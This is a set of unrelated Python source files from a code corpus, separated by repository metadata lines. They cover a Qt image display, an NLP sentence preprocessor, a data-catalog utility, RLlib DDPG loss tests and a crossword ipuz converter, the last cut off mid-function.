timer.setSingleShot(True)
timer.timeout.connect(self._view.onTimer)
timer.start()
LOG.debug("Starting Qt Main Event Loop (exec_)")
self._application.exec_()
LOG.debug("Qt Main Event Loop (exec_) has ended.")
if timeout is not None:
timer.stop()
timer.timeout.disconnect(self._view.onTimer)
self._event_loop = None
LOG.info("Qt Main Event Loop finished (event loop=%s, closed=%s).",
self.event_loop_is_running(), self.closed)
def _run_nonblocking_event_loop(self) -> None:
# FIXME[hack]: calling _process_events from a background task
# seems to have no effect for Qt. It seems that it really has
# to be called from the main thread!
# Hence we do not start a background thread here but instead
# call process_events once. This will not result in a smooth
# interface, but at least it will show the images.
self._process_events()
def _process_events(self) -> None:
"""Process events for the graphical user interface of
this :py:class:`ImageDisplay`. Pending events are processed
in a blocking mode.
Note: Qt requires that event processing is run in the main
thread.
"""
self._application.processEvents()
# FIXME[hack]: when running without an event loop (and even when
# setting blocking=False and using explicit event processing),
# we seem to be not notified when the window is closed (by clicking
# the window decoration close button).
# Hence we adapt opened and closed to explicitly check
# the status of the window. A future implementation should
# improve this in several directions:
# - check why we are not informed (we probably need some event handler)
# - it seems suboptimal to have to adapt both methods
# (opened and closed)- just changing one should be enough
# -> redesign the class ...
@property
def opened(self) -> bool:
"""Check if this image :py:class:`Display` is opened, meaning
the display window is shown and an event loop is running.
"""
return self._view.isVisible() and self._opened
@property
def closed(self) -> bool:
"""Check if this image :py:class:`Display` is closed, meaning
that no window is shown (and no event loop is running).
"""
return not self._view.isVisible() or not self._opened
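# A minimal, hypothetical usage sketch for the display above (not part of the module).
# It assumes the BaseImageDisplay base class exposes public show()/close() wrappers
# around the _show()/_open()/_close() hooks defined here, which is not shown in this
# file; treat it as an illustration of the standard (no separate event loop) mode only.
#
#   import numpy as np
#   display = ImageDisplay()
#   display.show(np.zeros((64, 64, 3), dtype=np.uint8), title="black frame")
#   display.close()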
| 39.073643
| 96
| 0.651919
|
3c767a44f7806c81df1529b122181a6d19fafeaf
| 1,612
|
py
|
Python
|
sgnlp/models/csgec/preprocess.py
|
raymondng76/sgnlp
|
f09eada90ef5b1ee979901e5c14413d32e758049
|
[
"MIT"
] | 14
|
2021-08-02T01:52:18.000Z
|
2022-01-14T10:16:02.000Z
|
sgnlp/models/csgec/preprocess.py
|
raymondng76/sgnlp
|
f09eada90ef5b1ee979901e5c14413d32e758049
|
[
"MIT"
] | 29
|
2021-08-02T01:53:46.000Z
|
2022-03-30T05:40:46.000Z
|
sgnlp/models/csgec/preprocess.py
|
raymondng76/sgnlp
|
f09eada90ef5b1ee979901e5c14413d32e758049
|
[
"MIT"
] | 7
|
2021-08-02T01:54:19.000Z
|
2022-01-07T06:37:45.000Z
|
import re
import torch
from typing import List
from nltk import word_tokenize, sent_tokenize
def prepare_sentences(text):
# tokenize paragraph into sentences
original_sentences = sent_tokenize(text)
original_sentences = list(
map(lambda x: " ".join(word_tokenize(x)), original_sentences)
)
output = []
ctx = []
for idx, src in enumerate(original_sentences):
if idx == 0:
output += [[src, [src]]]
else:
output += [[src, ctx]]
if len(ctx) == 2:
ctx = ctx[1:]
ctx += [src]
output = list(map(lambda x: [x[0], " ".join(x[1])], output))
original_sentences = list(
map(
lambda sent: re.sub(r'\s([?.!,"](?:\s|$))', r"\1", sent), original_sentences
)
)
return original_sentences, output
class CsgecPreprocessor:
def __init__(self, src_tokenizer, ctx_tokenizer):
self.src_tokenizer = src_tokenizer
self.ctx_tokenizer = ctx_tokenizer
def __call__(self, texts: List[str]):
batch_src_ids = []
batch_ctx_ids = []
for text in texts:
src_ids = []
ctx_ids = []
original_sentences, prepared_inputs = prepare_sentences(text)
for src_text, ctx_text in prepared_inputs:
src_ids.append(torch.LongTensor(self.src_tokenizer(src_text).input_ids))
ctx_ids.append(torch.LongTensor(self.ctx_tokenizer(ctx_text).input_ids))
batch_src_ids.append(src_ids)
batch_ctx_ids.append(ctx_ids)
return batch_src_ids, batch_ctx_ids
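# Illustrative call (with made-up text) showing the shape of prepare_sentences() output:
# it returns the cleaned, detokenized sentences plus one [sentence, context] pair per
# sentence, where the context string is assembled from a small rolling window of nearby
# sentences (at most two are kept in the window at a time).
#
#   original_sentences, pairs = prepare_sentences(
#       "First sentence. Second sentence. Third sentence."
#   )
#   # len(original_sentences) == 3 and len(pairs) == 3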
| 27.793103
| 88
| 0.602978
|
31b6f670e1ce2d00db64c253572e9ea2b7c81da0
| 6,246
|
py
|
Python
|
src/data_source/catalog.py
|
ravwojdyla/public-data-source
|
54a693e18419b57cb50c3c3e8a78930ac472ac47
|
[
"Apache-2.0"
] | null | null | null |
src/data_source/catalog.py
|
ravwojdyla/public-data-source
|
54a693e18419b57cb50c3c3e8a78930ac472ac47
|
[
"Apache-2.0"
] | null | null | null |
src/data_source/catalog.py
|
ravwojdyla/public-data-source
|
54a693e18419b57cb50c3c3e8a78930ac472ac47
|
[
"Apache-2.0"
] | null | null | null |
from datetime import datetime, date
from typing import Optional, Union, Sequence
from pathlib import Path
import functools
import yaml
import fsspec
import os
from . import ENV_CATALOG_PATH
from .core import Entry, Catalog, Storage, DEFAULT_STORAGE
import logging
logger = logging.getLogger(__name__)
PathType = Union[str, Path]
def default_urlpath() -> str:
urlpath = os.getenv(ENV_CATALOG_PATH)
if not urlpath:
raise ValueError(
"Catalog must be provided explicitly or "
f'set using environment variable "{ENV_CATALOG_PATH}"'
)
return urlpath
def _check_urlpath(urlpath: Optional[PathType] = None) -> str:
if urlpath:
return str(urlpath)
return default_urlpath()
def merge(catalogs: Sequence[Catalog]) -> Catalog:
return functools.reduce(lambda x, y: x.merge(y), catalogs)
def empty() -> Catalog:
"""Create empty `Catalog` instance"""
return Catalog(entries=[])
def load(urlpath: Optional[PathType] = None) -> Catalog:
"""Load catalog from url or path
Parameters
----------
urlpath : Union[str, Path]
Path/URL for catalog, defaults to environment
variable 'CATALOG_PATH'
"""
urlpath = _check_urlpath(urlpath)
of = fsspec.open(urlpath, mode="r")
if not of.fs.exists(urlpath):
return empty()
with of.open() as f:
obj = yaml.load(f, Loader=yaml.FullLoader)
return Catalog(**obj)
def add_entry(entry: Entry, urlpath: Optional[PathType] = None, overwrite=False):
"""Add an entry to a pre-existing catalog
    The convenience function will load the catalog, add the entry, and
save the catalog to the same location.
Parameters
----------
entry : Entry
New entry to add
urlpath : PathType, optional
Path/URL for catalog, defaults to environment
variable 'CATALOG_PATH'
overwrite : bool, optional
Overwrite the entry in the catalog if it exists, by default False
Raises
------
KeyError
If `overwrite=False` and the entry already exists
"""
cat = load(urlpath=urlpath)
if overwrite and entry in cat:
cat.remove(entry)
cat.add(entry)
save(cat, urlpath)
def save(catalog: Catalog, urlpath: Optional[PathType] = None):
"""Save catalog to url or path
Parameters
----------
catalog : Catalog
Catalog to save
urlpath : PathType, optional
Path/URL for catalog, defaults to environment
variable 'CATALOG_PATH'
"""
urlpath = _check_urlpath(urlpath)
logger.info('Saving catalog to path "%s"', urlpath)
of = fsspec.open(urlpath, mode="w")
with of.open() as f:
yaml.dump(catalog.dict(), f)
def create_entry(
source: Union[str, dict],
slug: str,
version: str,
format: str,
type: str,
name: Optional[str] = None,
created: Optional[datetime] = None,
metadata: Optional[dict] = None,
properties: Optional[dict] = None,
storage: Storage = DEFAULT_STORAGE,
):
"""Create new catalog entry
This is a convenience over creating `core.*` objects directly.
Parameters
----------
source: Union[str, dict]
Slug for data source (e.g. 'clinvar', 'otp', 'gnomad') or dict for
`Source` instance (e.g. dict(name='gnomAD v3', slug='gnomad_v3'))
slug: str
Slug for data artifact
version: str
Version string (must start with 'v')
format: str
Name of artifact serialization format (e.g. 'parquet', 'csv')
type: str
Type of artifact serialization (e.g. 'file', 'directory', 'archive')
name: Optional[str]
Name of artifact (e.g. 'ClinVar Association Submission Summary' as
compared to slug 'submission_summary')
created: Optional[datetime]
Time at which the data artifact was created. There are three ways in
which this is most likely to be set:
1. For sources with semantic versions and no time based releases,
this should be a static timestamp approximately equal to the time
at which the corresponding semantic release, indicated by `version`,
was published.
2. For sources with no semantic versioning and time-based releases,
this should correspond to time-based release from the source (e.g.
ClinVar has monthly releases so this timestamp should be truncated
to a month).
3. For sources that continually update (typically those from APIs),
this should be equal to the time at which data was collected. In
other words, the timestamp is not specific to the source but to
the collection process.
If not provided, defaults to timestamp for midnight of current day.
metadata: Optional[dict]
Artifact metadata commonly used to store schema strings or other
informative but unstructured information
properties: Optional[dict]
Format properties such as compression, delimiters, partitions, etc.
storage: Storage
Destination for artifact data
Examples
--------
>> create_entry(
source='clinvar',
slug='submission_summary',
version='v2020-06',
created=datetime.now(),
format='parquet',
type='file'
)
Entry(
source=Source(slug='clinvar', name=None, description=None),
artifact=Artifact(
slug='submission_summary', version='v2020-06',
created=datetime.datetime(2020, 6, 10, 12, 12, 13, 859561),
formats=[Format(name=<FormatName.parquet: 'parquet'>, type=<FormatType.file: 'file'>, properties=None)],
name=None, metadata=None),
storage=Storage(slug='gcs', scheme='gs')
)
"""
if created is None:
created = datetime.combine(date.today(), datetime.min.time())
return Entry(
**dict(
source=dict(slug=source) if isinstance(source, str) else source,
artifact=dict(
slug=slug,
version=version,
created=created,
metadata=metadata,
formats=[dict(name=format, type=type, properties=properties)],
),
storage=storage,
)
)
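# A short usage sketch (illustrative only): build an entry with create_entry() and
# append it to a catalog file with add_entry(). The slug/version values mirror the
# docstring example above; the local "catalog.yaml" path is made up, and in practice
# the path may instead come from the CATALOG_PATH environment variable.
#
#   entry = create_entry(
#       source="clinvar",
#       slug="submission_summary",
#       version="v2020-06",
#       format="parquet",
#       type="file",
#   )
#   add_entry(entry, urlpath="catalog.yaml", overwrite=True)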
| 31.386935
| 116
| 0.638168
|
a66949b9bff5ffef667a1f80e3752dc14c83cf3a
| 21,950
|
py
|
Python
|
rllib/agents/ddpg/tests/test_ddpg.py
|
zommiommy/ray
|
aa1cbe8abc845e1a6acf2f237b4b00aa7c3f295d
|
[
"Apache-2.0"
] | null | null | null |
rllib/agents/ddpg/tests/test_ddpg.py
|
zommiommy/ray
|
aa1cbe8abc845e1a6acf2f237b4b00aa7c3f295d
|
[
"Apache-2.0"
] | null | null | null |
rllib/agents/ddpg/tests/test_ddpg.py
|
zommiommy/ray
|
aa1cbe8abc845e1a6acf2f237b4b00aa7c3f295d
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import re
import unittest
import ray.rllib.agents.ddpg as ddpg
from ray.rllib.agents.ddpg.ddpg_torch_policy import ddpg_actor_critic_loss as \
loss_torch
from ray.rllib.agents.sac.tests.test_sac import SimpleEnv
from ray.rllib.execution.replay_buffer import LocalReplayBuffer
from ray.rllib.policy.sample_batch import SampleBatch
from ray.rllib.utils.framework import try_import_tf, try_import_torch
from ray.rllib.utils.numpy import fc, huber_loss, l2_loss, relu, sigmoid
from ray.rllib.utils.test_utils import check, framework_iterator, \
check_compute_action
from ray.rllib.utils.torch_ops import convert_to_torch_tensor
tf = try_import_tf()
torch, _ = try_import_torch()
class TestDDPG(unittest.TestCase):
def test_ddpg_compilation(self):
"""Test whether a DDPGTrainer can be built with both frameworks."""
config = ddpg.DEFAULT_CONFIG.copy()
config["num_workers"] = 0 # Run locally.
config["num_envs_per_worker"] = 2 # Run locally.
num_iterations = 2
# Test against all frameworks.
for _ in framework_iterator(config, ("tf", "torch")):
trainer = ddpg.DDPGTrainer(config=config, env="Pendulum-v0")
for i in range(num_iterations):
results = trainer.train()
print(results)
check_compute_action(trainer)
def test_ddpg_exploration_and_with_random_prerun(self):
"""Tests DDPG's Exploration (w/ random actions for n timesteps)."""
core_config = ddpg.DEFAULT_CONFIG.copy()
core_config["num_workers"] = 0 # Run locally.
obs = np.array([0.0, 0.1, -0.1])
# Test against all frameworks.
for _ in framework_iterator(core_config, ("torch", "tf")):
config = core_config.copy()
# Default OUNoise setup.
trainer = ddpg.DDPGTrainer(config=config, env="Pendulum-v0")
# Setting explore=False should always return the same action.
a_ = trainer.compute_action(obs, explore=False)
for _ in range(50):
a = trainer.compute_action(obs, explore=False)
check(a, a_)
# explore=None (default: explore) should return different actions.
actions = []
for _ in range(50):
actions.append(trainer.compute_action(obs))
check(np.std(actions), 0.0, false=True)
# Check randomness at beginning.
config["exploration_config"] = {
# Act randomly at beginning ...
"random_timesteps": 50,
# Then act very closely to deterministic actions thereafter.
"ou_base_scale": 0.001,
"initial_scale": 0.001,
"final_scale": 0.001,
}
trainer = ddpg.DDPGTrainer(config=config, env="Pendulum-v0")
# ts=1 (get a deterministic action as per explore=False).
deterministic_action = trainer.compute_action(obs, explore=False)
# ts=2-5 (in random window).
random_a = []
for _ in range(49):
random_a.append(trainer.compute_action(obs, explore=True))
check(random_a[-1], deterministic_action, false=True)
self.assertTrue(np.std(random_a) > 0.5)
# ts > 50 (a=deterministic_action + scale * N[0,1])
for _ in range(50):
a = trainer.compute_action(obs, explore=True)
check(a, deterministic_action, rtol=0.1)
# ts >> 50 (BUT: explore=False -> expect deterministic action).
for _ in range(50):
a = trainer.compute_action(obs, explore=False)
check(a, deterministic_action)
def test_ddpg_loss_function(self):
"""Tests DDPG loss function results across all frameworks."""
config = ddpg.DEFAULT_CONFIG.copy()
# Run locally.
config["num_workers"] = 0
config["learning_starts"] = 0
config["twin_q"] = True
config["use_huber"] = True
config["huber_threshold"] = 1.0
config["gamma"] = 0.99
# Make this small (seems to introduce errors).
config["l2_reg"] = 1e-10
config["prioritized_replay"] = False
# Use very simple nets.
config["actor_hiddens"] = [10]
config["critic_hiddens"] = [10]
# Make sure, timing differences do not affect trainer.train().
config["min_iter_time_s"] = 0
config["timesteps_per_iteration"] = 100
map_ = {
# Normal net.
"default_policy/actor_hidden_0/kernel": "policy_model.action_0."
"_model.0.weight",
"default_policy/actor_hidden_0/bias": "policy_model.action_0."
"_model.0.bias",
"default_policy/actor_out/kernel": "policy_model.action_out."
"_model.0.weight",
"default_policy/actor_out/bias": "policy_model.action_out."
"_model.0.bias",
"default_policy/sequential/q_hidden_0/kernel": "q_model.q_hidden_0"
"._model.0.weight",
"default_policy/sequential/q_hidden_0/bias": "q_model.q_hidden_0."
"_model.0.bias",
"default_policy/sequential/q_out/kernel": "q_model.q_out._model."
"0.weight",
"default_policy/sequential/q_out/bias": "q_model.q_out._model."
"0.bias",
# -- twin.
"default_policy/sequential_1/twin_q_hidden_0/kernel": "twin_"
"q_model.twin_q_hidden_0._model.0.weight",
"default_policy/sequential_1/twin_q_hidden_0/bias": "twin_"
"q_model.twin_q_hidden_0._model.0.bias",
"default_policy/sequential_1/twin_q_out/kernel": "twin_"
"q_model.twin_q_out._model.0.weight",
"default_policy/sequential_1/twin_q_out/bias": "twin_"
"q_model.twin_q_out._model.0.bias",
# Target net.
"default_policy/actor_hidden_0_1/kernel": "policy_model.action_0."
"_model.0.weight",
"default_policy/actor_hidden_0_1/bias": "policy_model.action_0."
"_model.0.bias",
"default_policy/actor_out_1/kernel": "policy_model.action_out."
"_model.0.weight",
"default_policy/actor_out_1/bias": "policy_model.action_out._model"
".0.bias",
"default_policy/sequential_2/q_hidden_0/kernel": "q_model."
"q_hidden_0._model.0.weight",
"default_policy/sequential_2/q_hidden_0/bias": "q_model."
"q_hidden_0._model.0.bias",
"default_policy/sequential_2/q_out/kernel": "q_model."
"q_out._model.0.weight",
"default_policy/sequential_2/q_out/bias": "q_model."
"q_out._model.0.bias",
# -- twin.
"default_policy/sequential_3/twin_q_hidden_0/kernel": "twin_"
"q_model.twin_q_hidden_0._model.0.weight",
"default_policy/sequential_3/twin_q_hidden_0/bias": "twin_"
"q_model.twin_q_hidden_0._model.0.bias",
"default_policy/sequential_3/twin_q_out/kernel": "twin_"
"q_model.twin_q_out._model.0.weight",
"default_policy/sequential_3/twin_q_out/bias": "twin_"
"q_model.twin_q_out._model.0.bias",
}
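        # Note: tf Dense kernels are stored as (in, out) while torch Linear weights are
        # (out, in); this is why the weight and gradient comparisons further below fall
        # back to np.transpose() whenever the two shapes differ.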
env = SimpleEnv
batch_size = 100
if env is SimpleEnv:
obs_size = (batch_size, 1)
actions = np.random.random(size=(batch_size, 1))
elif env == "CartPole-v0":
obs_size = (batch_size, 4)
actions = np.random.randint(0, 2, size=(batch_size, ))
else:
obs_size = (batch_size, 3)
actions = np.random.random(size=(batch_size, 1))
# Batch of size=n.
input_ = self._get_batch_helper(obs_size, actions, batch_size)
# Simply compare loss values AND grads of all frameworks with each
# other.
prev_fw_loss = weights_dict = None
expect_c, expect_a, expect_t = None, None, None
# History of tf-updated NN-weights over n training steps.
tf_updated_weights = []
# History of input batches used.
tf_inputs = []
for fw, sess in framework_iterator(
config, frameworks=("tf", "torch"), session=True):
# Generate Trainer and get its default Policy object.
trainer = ddpg.DDPGTrainer(config=config, env=env)
policy = trainer.get_policy()
p_sess = None
if sess:
p_sess = policy.get_session()
# Set all weights (of all nets) to fixed values.
if weights_dict is None:
assert fw == "tf" # Start with the tf vars-dict.
weights_dict = policy.get_weights()
else:
assert fw == "torch" # Then transfer that to torch Model.
model_dict = self._translate_weights_to_torch(
weights_dict, map_)
policy.model.load_state_dict(model_dict)
policy.target_model.load_state_dict(model_dict)
if fw == "torch":
# Actually convert to torch tensors.
input_ = policy._lazy_tensor_dict(input_)
input_ = {k: input_[k] for k in input_.keys()}
# Only run the expectation once, should be the same anyways
# for all frameworks.
if expect_c is None:
expect_c, expect_a, expect_t = \
self._ddpg_loss_helper(
input_, weights_dict, sorted(weights_dict.keys()), fw,
gamma=config["gamma"],
huber_threshold=config["huber_threshold"],
l2_reg=config["l2_reg"],
sess=sess)
# Get actual outs and compare to expectation AND previous
# framework. c=critic, a=actor, e=entropy, t=td-error.
if fw == "tf":
c, a, t, tf_c_grads, tf_a_grads = \
p_sess.run([
policy.critic_loss,
policy.actor_loss,
policy.td_error,
policy._critic_optimizer.compute_gradients(
policy.critic_loss,
policy.model.q_variables()),
policy._actor_optimizer.compute_gradients(
policy.actor_loss,
policy.model.policy_variables())],
feed_dict=policy._get_loss_inputs_dict(
input_, shuffle=False))
# Check pure loss values.
check(c, expect_c)
check(a, expect_a)
check(t, expect_t)
tf_c_grads = [g for g, v in tf_c_grads]
tf_a_grads = [g for g, v in tf_a_grads]
elif fw == "torch":
loss_torch(policy, policy.model, None, input_)
c, a, t = policy.critic_loss, policy.actor_loss, \
policy.td_error
# Check pure loss values.
check(c, expect_c)
check(a, expect_a)
check(t, expect_t)
# Test actor gradients.
policy._actor_optimizer.zero_grad()
assert all(v.grad is None for v in policy.model.q_variables())
assert all(
v.grad is None for v in policy.model.policy_variables())
a.backward()
# `actor_loss` depends on Q-net vars
# (but not twin-Q-net vars!).
assert not any(v.grad is None
for v in policy.model.q_variables()[:4])
assert all(
v.grad is None for v in policy.model.q_variables()[4:])
assert not all(
torch.mean(v.grad) == 0
for v in policy.model.policy_variables())
assert not all(
torch.min(v.grad) == 0
for v in policy.model.policy_variables())
# Compare with tf ones.
torch_a_grads = [
v.grad for v in policy.model.policy_variables()
]
for tf_g, torch_g in zip(tf_a_grads, torch_a_grads):
if tf_g.shape != torch_g.shape:
check(tf_g, np.transpose(torch_g))
else:
check(tf_g, torch_g)
# Test critic gradients.
policy._critic_optimizer.zero_grad()
assert all(
v.grad is None or torch.mean(v.grad) == 0.0
for v in policy.model.q_variables())
assert all(
v.grad is None or torch.min(v.grad) == 0.0
for v in policy.model.q_variables())
c.backward()
assert not all(
torch.mean(v.grad) == 0
for v in policy.model.q_variables())
assert not all(
torch.min(v.grad) == 0 for v in policy.model.q_variables())
# Compare with tf ones.
torch_c_grads = [v.grad for v in policy.model.q_variables()]
for tf_g, torch_g in zip(tf_c_grads, torch_c_grads):
if tf_g.shape != torch_g.shape:
check(tf_g, np.transpose(torch_g))
else:
check(tf_g, torch_g)
# Compare (unchanged(!) actor grads) with tf ones.
torch_a_grads = [
v.grad for v in policy.model.policy_variables()
]
for tf_g, torch_g in zip(tf_a_grads, torch_a_grads):
if tf_g.shape != torch_g.shape:
check(tf_g, np.transpose(torch_g))
else:
check(tf_g, torch_g)
# Store this framework's losses in prev_fw_loss to compare with
# next framework's outputs.
if prev_fw_loss is not None:
check(c, prev_fw_loss[0])
check(a, prev_fw_loss[1])
check(t, prev_fw_loss[2])
prev_fw_loss = (c, a, t)
# Update weights from our batch (n times).
for update_iteration in range(10):
print("train iteration {}".format(update_iteration))
if fw == "tf":
in_ = self._get_batch_helper(obs_size, actions, batch_size)
tf_inputs.append(in_)
# Set a fake-batch to use
# (instead of sampling from replay buffer).
buf = LocalReplayBuffer.get_instance_for_testing()
buf._fake_batch = in_
trainer.train()
updated_weights = policy.get_weights()
# Net must have changed.
if tf_updated_weights:
check(
updated_weights[
"default_policy/actor_hidden_0/kernel"],
tf_updated_weights[-1][
"default_policy/actor_hidden_0/kernel"],
false=True)
tf_updated_weights.append(updated_weights)
# Compare with updated tf-weights. Must all be the same.
else:
tf_weights = tf_updated_weights[update_iteration]
in_ = tf_inputs[update_iteration]
# Set a fake-batch to use
# (instead of sampling from replay buffer).
buf = LocalReplayBuffer.get_instance_for_testing()
buf._fake_batch = in_
trainer.train()
# Compare updated model and target weights.
for tf_key in tf_weights.keys():
tf_var = tf_weights[tf_key]
# Target model.
if re.search(
"actor_out_1|actor_hidden_0_1|sequential_"
"[23]", tf_key):
torch_var = policy.target_model.state_dict()[map_[
tf_key]]
# Model.
else:
torch_var = policy.model.state_dict()[map_[tf_key]]
if tf_var.shape != torch_var.shape:
check(tf_var, np.transpose(torch_var), rtol=0.07)
else:
check(tf_var, torch_var, rtol=0.07)
trainer.stop()
def _get_batch_helper(self, obs_size, actions, batch_size):
return {
SampleBatch.CUR_OBS: np.random.random(size=obs_size),
SampleBatch.ACTIONS: actions,
SampleBatch.REWARDS: np.random.random(size=(batch_size, )),
SampleBatch.DONES: np.random.choice(
[True, False], size=(batch_size, )),
SampleBatch.NEXT_OBS: np.random.random(size=obs_size),
"weights": np.ones(shape=(batch_size, )),
}
def _ddpg_loss_helper(self, train_batch, weights, ks, fw, gamma,
huber_threshold, l2_reg, sess):
"""Emulates DDPG loss functions for tf and torch."""
model_out_t = train_batch[SampleBatch.CUR_OBS]
target_model_out_tp1 = train_batch[SampleBatch.NEXT_OBS]
# get_policy_output
policy_t = sigmoid(2.0 * fc(
relu(
fc(model_out_t, weights[ks[1]], weights[ks[0]], framework=fw)),
weights[ks[5]], weights[ks[4]]))
# Get policy output for t+1 (target model).
policy_tp1 = sigmoid(2.0 * fc(
relu(
fc(target_model_out_tp1,
weights[ks[3]],
weights[ks[2]],
framework=fw)), weights[ks[7]], weights[ks[6]]))
# Assume no smooth target policy.
policy_tp1_smoothed = policy_tp1
# Q-values for the actually selected actions.
# get_q_values
q_t = fc(
relu(
fc(np.concatenate(
[model_out_t, train_batch[SampleBatch.ACTIONS]], -1),
weights[ks[9]],
weights[ks[8]],
framework=fw)),
weights[ks[11]],
weights[ks[10]],
framework=fw)
twin_q_t = fc(
relu(
fc(np.concatenate(
[model_out_t, train_batch[SampleBatch.ACTIONS]], -1),
weights[ks[13]],
weights[ks[12]],
framework=fw)),
weights[ks[15]],
weights[ks[14]],
framework=fw)
# Q-values for current policy in given current state.
# get_q_values
q_t_det_policy = fc(
relu(
fc(np.concatenate([model_out_t, policy_t], -1),
weights[ks[9]],
weights[ks[8]],
framework=fw)),
weights[ks[11]],
weights[ks[10]],
framework=fw)
# Target q network evaluation.
# target_model.get_q_values
q_tp1 = fc(
relu(
fc(np.concatenate([target_model_out_tp1, policy_tp1_smoothed],
-1),
weights[ks[17]],
weights[ks[16]],
framework=fw)),
weights[ks[19]],
weights[ks[18]],
framework=fw)
twin_q_tp1 = fc(
relu(
fc(np.concatenate([target_model_out_tp1, policy_tp1_smoothed],
-1),
weights[ks[21]],
weights[ks[20]],
framework=fw)),
weights[ks[23]],
weights[ks[22]],
framework=fw)
q_t_selected = np.squeeze(q_t, axis=-1)
twin_q_t_selected = np.squeeze(twin_q_t, axis=-1)
q_tp1 = np.minimum(q_tp1, twin_q_tp1)
q_tp1_best = np.squeeze(q_tp1, axis=-1)
dones = train_batch[SampleBatch.DONES]
rewards = train_batch[SampleBatch.REWARDS]
if fw == "torch":
dones = dones.float().numpy()
rewards = rewards.numpy()
q_tp1_best_masked = (1.0 - dones) * q_tp1_best
q_t_selected_target = rewards + gamma * q_tp1_best_masked
td_error = q_t_selected - q_t_selected_target
twin_td_error = twin_q_t_selected - q_t_selected_target
td_error = td_error + twin_td_error
errors = huber_loss(td_error, huber_threshold) + \
huber_loss(twin_td_error, huber_threshold)
critic_loss = np.mean(errors)
actor_loss = -np.mean(q_t_det_policy)
# Add l2-regularization if required.
for name, var in weights.items():
if re.match("default_policy/actor_(hidden_0|out)/kernel", name):
actor_loss += (l2_reg * l2_loss(var))
elif re.match("default_policy/sequential(_1)?/\\w+/kernel", name):
critic_loss += (l2_reg * l2_loss(var))
return critic_loss, actor_loss, td_error
def _translate_weights_to_torch(self, weights_dict, map_):
model_dict = {
map_[k]: convert_to_torch_tensor(
np.transpose(v) if re.search("kernel", k) else v)
for k, v in weights_dict.items() if re.search(
"default_policy/(actor_(hidden_0|out)|sequential(_1)?)/", k)
}
return model_dict
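# Illustrative sketch (not part of the original test; the helper name is
# hypothetical): why _translate_weights_to_torch() transposes "kernel"
# matrices. tf.keras Dense layers store kernels as (in_features, out_features),
# while torch.nn.Linear stores weights as (out_features, in_features), so a
# transpose is needed before load_state_dict() for both nets to compute the
# same affine map.
def _kernel_translation_sketch():
    tf_kernel = np.arange(12, dtype=np.float32).reshape(3, 4)  # (in=3, out=4)
    linear = torch.nn.Linear(3, 4, bias=False)                 # weight: (4, 3)
    linear.load_state_dict(
        {"weight": torch.from_numpy(np.transpose(tf_kernel).copy())})
    x = np.ones((1, 3), dtype=np.float32)
    # Same result from the TF-style matmul and the torch Linear layer.
    assert np.allclose(x.dot(tf_kernel),
                       linear(torch.from_numpy(x)).detach().numpy())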
if __name__ == "__main__":
import pytest
import sys
sys.exit(pytest.main(["-v", __file__]))
| 43.208661
| 79
| 0.536538
|
d177fb449b3b4b4da37cd92b73d61e3a186fd129
| 3,875
|
py
|
Python
|
crossword/format_ipuz.py
|
jmviz/xd
|
f905e5c61b2835073b19cc3fa0d6917432fa7ece
|
[
"MIT"
] | 179
|
2016-03-05T03:14:56.000Z
|
2022-02-12T22:48:55.000Z
|
crossword/format_ipuz.py
|
jmviz/xd
|
f905e5c61b2835073b19cc3fa0d6917432fa7ece
|
[
"MIT"
] | 24
|
2016-02-14T07:43:42.000Z
|
2021-12-14T01:09:54.000Z
|
crossword/format_ipuz.py
|
jmviz/xd
|
f905e5c61b2835073b19cc3fa0d6917432fa7ece
|
[
"MIT"
] | 25
|
2016-02-19T20:35:03.000Z
|
2022-01-31T09:15:44.000Z
|
# -*- coding: utf-8 -*-
from crossword.core import Crossword, CrosswordCell
from crossword.exceptions import CrosswordException
def from_ipuz(ipuz_dict):
for kind in ipuz_dict['kind']:
if not kind.startswith("http://ipuz.org/crossword"):
raise CrosswordException
known_keys = (
"dimensions",
"editor",
"author",
"date",
"notes",
"uniqueid",
"publisher",
"copyright",
"title",
"block",
"empty",
"clues",
"puzzle",
"solution",
)
crossword = Crossword(
ipuz_dict['dimensions']['width'],
ipuz_dict['dimensions']['height']
)
crossword._format_identifier = Crossword.IPUZ
crossword.meta.contributor = ipuz_dict.get('editor')
crossword.meta.creator = ipuz_dict.get('author')
crossword.meta.date = ipuz_dict.get('date')
crossword.meta.description = ipuz_dict.get('notes')
crossword.meta.identifier = ipuz_dict.get('uniqueid')
crossword.meta.publisher = ipuz_dict.get('publisher')
crossword.meta.rights = ipuz_dict.get('copyright')
crossword.meta.title = ipuz_dict.get('title')
crossword.block = ipuz_dict.get('block')
crossword.empty = ipuz_dict.get('empty')
for number, clue in ipuz_dict.get('clues', {}).get('Across', []):
crossword.clues.across[number] = clue
for number, clue in ipuz_dict.get('clues', {}).get('Down', []):
crossword.clues.down[number] = clue
for x, y in crossword.cells:
crossword[x, y] = CrosswordCell()
for key in ('puzzle', 'solution'):
entry = ipuz_dict.get(key)
for x, y in crossword.cells:
try:
crossword[x, y][key] = entry[y][x]
except (IndexError, TypeError):
crossword[x, y][key] = None
for key, value in ipuz_dict.items():
if key not in known_keys:
crossword._format[key] = value
return crossword
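# Illustrative sketch (not part of this module; the function name and all
# values are hypothetical): the minimal set of ipuz fields that from_ipuz()
# reads when building a Crossword object.
def _example_from_ipuz():
    ipuz_dict = {
        "kind": ["http://ipuz.org/crossword#1"],
        "dimensions": {"width": 2, "height": 2},
        "title": "Example",
        "puzzle": [[1, 2], [3, 0]],
        "solution": [["A", "B"], ["C", "D"]],
        "clues": {"Across": [[1, "First clue"]], "Down": [[2, "Second clue"]]},
    }
    crossword = from_ipuz(ipuz_dict)
    return crossword.meta.title, crossword.clues.across[1]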
def to_ipuz(crossword):
ipuz_dict = {
"version": "http://ipuz.org/v1",
"dimensions": {
"width": crossword.width,
"height": crossword.height,
},
"puzzle": [
[getattr(cell, "puzzle", None) for cell in row]
for row in crossword._data
],
"solution": [
[getattr(cell, "solution", None) for cell in row]
for row in crossword._data
],
}
if crossword.meta.creator is not None:
ipuz_dict["author"] = crossword.meta.creator
if crossword.meta.rights is not None:
ipuz_dict["copyright"] = crossword.meta.rights
if crossword.meta.date is not None:
ipuz_dict["date"] = crossword.meta.date
if crossword.meta.contributor is not None:
ipuz_dict["editor"] = crossword.meta.contributor
if crossword.meta.description is not None:
ipuz_dict["notes"] = crossword.meta.description
if crossword.meta.publisher is not None:
ipuz_dict["publisher"] = crossword.meta.publisher
if crossword.meta.identifier is not None:
ipuz_dict["uniqueid"] = crossword.meta.identifier
if crossword.meta.title is not None:
ipuz_dict["title"] = crossword.meta.title
if crossword.block is not None:
ipuz_dict["block"] = crossword.block
